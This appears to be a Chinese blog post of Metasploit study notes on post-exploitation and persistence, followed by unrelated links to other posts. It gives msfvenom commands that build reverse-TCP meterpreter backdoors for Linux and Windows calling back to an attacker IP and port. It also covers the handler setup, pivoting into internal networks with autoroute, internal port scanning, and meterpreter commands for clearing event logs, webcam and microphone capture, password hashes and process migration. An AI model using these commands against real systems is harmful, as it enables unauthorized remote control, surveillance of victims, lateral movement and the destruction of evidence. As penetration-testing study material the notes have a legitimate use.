年初九 天公生

0x034 MSF(美少妇)

  • 启动msf msfconsole

    • 先启动msf依赖的postgresql数据库

      • 初始化数据库 msfdb init (要用普通用户)
  • msf路径 /usr/share

  • 制作后门 msfvenom

    • msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名
    • linux示例

      • msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell
    • windows示例

      • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe
  • 远控流程

    • 连接后门

      • 1.制作后门上传到目标机并运行

        • 详见上一条
      • 2.开启msf并进入handle模块

        • use exploit/multi/handler
      • 3.设置payload类型(必须与第一步一致)

        • set payload payload名字
      • 4.设置lhost和lport(与第一步生成的后门一致)

        • set lhost 监听ip
        • set lport 监听端口
      • 5.options查看配置是否正确
      • 6.run运行

        • 进入meterpreter控制终端

          • 执行shell可进入目标机终端
          • run可执行自带脚本或post模块

            • 自带脚本文件在/usr/share/metasploit-framework/script
            • post模块在/usr/share/metasploit-framework/modules/post
      • bg将进程放到后台,sessions查看,sessions 进程id 返回到进程

    • 添加内网路由
      (被控制的目标机只能访问外网不能访问内网,给它添加路由以访问内网)

      • 1.连接上shell之后运行脚本 run get_local_subnets
      • 2.run autoroute -s 内网网段 #例如192.168.223.0/24
      • 3.run autoroute -p
    • 内网扫描

      • 1.用bg把进程放到后台,打开扫描端口模块

        • use auxiliary/scanner/portscan/tcp
      • 2.设置主机段

        • set rhosts 内网网段 (和上一小节一样)
      • 3.设置扫描端口

        • set ports 端口1,端口2
      • 4.设置线程

        • set threads 线程数
      • 5.run 执行脚本
      • back 退出当前模块

    • 端口转发

      • Portfwd
    • 常用命令

      • 核心命令

        • bg
        • sessions
        • load

          • 和use一样
        • run

      • 文件操作

        • cat
        • cd
        • cp
        • dir
        • download
        • upload
        • ls
        • ps
        • search
      • 网络命令

        • if/ipcondig
        • netstat
        • portfwd
        • getproxy
      • 系统命令

        • clearev
        • kill
        • shell
        • powershell
        • sysinfo
      • 用户界面命令

        • screenshot
      • 其他

        • 摄像头

          • 麦克风

            • 密码哈希
    • 进程注入

      • migrate 被注入的进程号

内网渗透之权限维持 - MSF的更多相关文章

  1. 内网渗透之权限维持 - MSF与cs联动

    年初六 六六六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 ms ...

  2. 利用MSF实现三层网络的一次内网渗透

    目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为  image/jpeg 上传大马之后发 ...

  3. 【CTF】msf和impacket联合拿域控内网渗透-拿域控

    前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...

  4. MSF 内网渗透笔记

    进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControl ...

  5. metasploit渗透测试笔记(内网渗透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...

  6. Metasploit 内网渗透篇

    0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...

  7. 3.内网渗透之reGeorg+Proxifier

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...

  8. 记录一次坎坷的linux内网渗透过程瞎折腾的坑

    版权声明:本文为博主的原创文章,未经博主同意不得转载. 写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2. ...

  9. Linux内网渗透

    Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...

随机推荐

  1. keras使用、函数功能

    #1. keras.engine.input_layer.Input() def Input(shape=None, batch_shape=None,   name=None, dtype=None ...

  2. MySQL中的GIS几何函数和空间分析函数

    MySQL空间扩展不仅提供了空间数据的存储能力,而且还具备一些空间运算能力,这些功能通过MySQL内建的几何函数实现.最简单的几何函数昨天已经有所涉及,也就是转换WTK的GEOMFROMTEXT和AS ...

  3. htaccess 伪静态的规则

    利用htaccess文件可以很好的进行站点伪静态,并且形成的目标地址与真正的静态页面几乎一模一样,如abc.html等,伪静态可以非常好的结合SEO来提高站点的排名,并且也能给人一种稳定的印象. 由于 ...

  4. keep pace with |sixes and sevens.|Three dozen of |setting out|in despite of|appetite for|brought up|.turn to|leave behind|As can be seen|every

    Heavy but not excessive: network capacity seems to have done little more than keep pace with economi ...

  5. JAVA异常处理原则和log4j输出详细异常分析

    1.多用try,catch;不要一个try,catch包含所有内容 好处:不同模块抓取不同异常,某一模块异常挂了,不影响其他模块的程序的进行 2.多写几个catche:尽量不要使用Exception这 ...

  6. CPU|MICGPU|FPGA|超算|Meta-data|

    生物医学大数据: 收集数据后对数据的分析,如同看相,而对数据信息的挖掘可以看作是算命.这两个过程是基于算法和软件这类工具之上的. 在存储方面:在硬件上,为了Parallel computing的目的, ...

  7. Spring学习笔记(七)模拟实际开发过程的调用过程XML版-Setter方式注入

    模拟实际开发过程的调用过程XML版-Setter方式注入 源码获取github [TOC] 1.项目结构 2.jar包跟上个一样 3.重写set方法 UserServiceImpl.java 1234 ...

  8. NSURLSession与NSURLConnection区别

    1. 使用现状      NSURLSession是NSURLConnection 的替代者,在2013年苹果全球开发者大会(WWDC2013)随ios7一起发布,是对NSURLConnection进 ...

  9. 阿里云Confluence无法发送邮件修复

    阿里云屏蔽外网的25端口,防止发送垃圾邮件,所以导致阿里云上的ecs无法发送邮箱 采用腾讯邮箱,端口25和465都试了好几遍,最终改成587即可 参考https://blog.csdn.net/qq_ ...

  10. 面试的绝招(V1.0)

    <软件自动化测试开发>出版了 测试开发公开课培训大讲堂 微信公众号:测试开发社区 测试开发QQ群:173172133 咨询QQ:7980068 咨询微信:zouhui1003it